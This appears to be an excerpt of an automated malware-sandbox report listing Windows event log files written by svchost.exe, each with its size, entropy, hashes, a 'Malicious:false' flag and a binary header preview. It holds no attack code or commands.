                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.8432997252442703
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                                                                  MD5:39EE3557626C7F112A88A4DE12E904C1
                                                                                                  SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                                                                  SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                                                                  SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.9223892466691472
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                                                                  MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                                                                  SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                                                                  SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                                                                  SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.838106263184782
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                                                                  MD5:A2D41740C1BAF781019F282E37288DDF
                                                                                                  SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                                                                  SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                                                                  SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.634418630947688
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                                                                  MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                                                                  SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                                                                  SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                                                                  SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.0646587531847893
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                                                                  MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                                                                  SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                                                                  SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                                                                  SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.4364303862010575
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                                                                  MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                                                                  SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                                                                  SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                                                                  SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.0631557320109892
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                                                                  MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                                                                  SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                                                                  SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                                                                  SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.4467272005363894
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                                                                  MD5:155681C222D825199B738E8DEC707DC8
                                                                                                  SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                                                                  SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                                                                  SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.156155224835584
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                                                                  MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                                                                  SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                                                                  SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                                                                  SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.9197999988543422
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                                                                  MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                                                                  SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                                                                  SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                                                                  SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                                                                                                  Category:dropped
                                                                                                  Size (bytes):76544
                                                                                                  Entropy (8bit):4.551581311383684
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:OLjpPv++M48PFVbUa+56NvbLjpPv++M48PFVbUa+56Nvc20sMY3Dp13/n/ydIxmt:cU
                                                                                                  MD5:EF2745B17B61B3C73CD29D0FC80FCE2E
                                                                                                  SHA1:A58D9CD758A53AA94FA43709E50A7C1F00922474
                                                                                                  SHA-256:5111A0D7F483A9ADD949B84FDADD215EEF1BA60C0AA47379F50D5CC674E75AB6
                                                                                                  SHA-512:72A4FB01A8C3CDDDEAC8857B8B99EFB0E550E3EE625292B587621D5E06041A7E3248C981BCA638A804A65E341269986DF799AEF13D6A27B256EB2A0128C9F004
                                                                                                  Malicious:false
                                                                                                  Preview:ElfFile.....................................................................................................................I..ElfChnk......................................(...*...\......................................................................."..................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):5.718426658668259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                                                                  MD5:8630011707C7BFBCECC0A9430637802E
                                                                                                  SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                                                                  SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                                                                  SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.9963080376858662
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                                                                  MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                                                                  SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                                                                  SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                                                                  SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.076996627399968
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                                                                  MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                                                                  SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                                                                  SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                                                                  SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.226573946735512
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:vvhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGj:vvZxGp9bf
                                                                                                  MD5:ECA76A209D26097AB9C9F253D10DAF56
                                                                                                  SHA1:1B3D9F4EB0BA45C9A0966F7451625D967D44040F
                                                                                                  SHA-256:0138BEF5AC969BB85E7C6A897E4709C02D845F91875E3132FDAD6D357BAB4122
                                                                                                  SHA-512:3C449A8FB23C1552A4DCD0C266DEE129E7E9A7FEAEC4DAE3E6EA17274C5BCE2E604C1ADB3F4F86F05156A5DE9E786BDA3C2344DD90C67246BE0B490CA3BBD906
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.T...............T...................P...h...2vo......................................................................n.........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a.................................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.801423310886069
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                                                                  MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                                                                  SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                                                                  SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                                                                  SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.996272372482282
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                                                                  MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                                                                  SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                                                                  SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                                                                  SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):68304
                                                                                                  Entropy (8bit):3.940348675757021
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:RtsxIdP4Vy+Fxl5LDKpkVLIcXhNMUekAYwkR1Nt/VWwvNt/MRYutDBjV8k+x7eUl:B4Vy+X6n2PButDBjV8k+x7PtHpoVW
                                                                                                  MD5:BB2558A4C418CE5B840710A215CA5B92
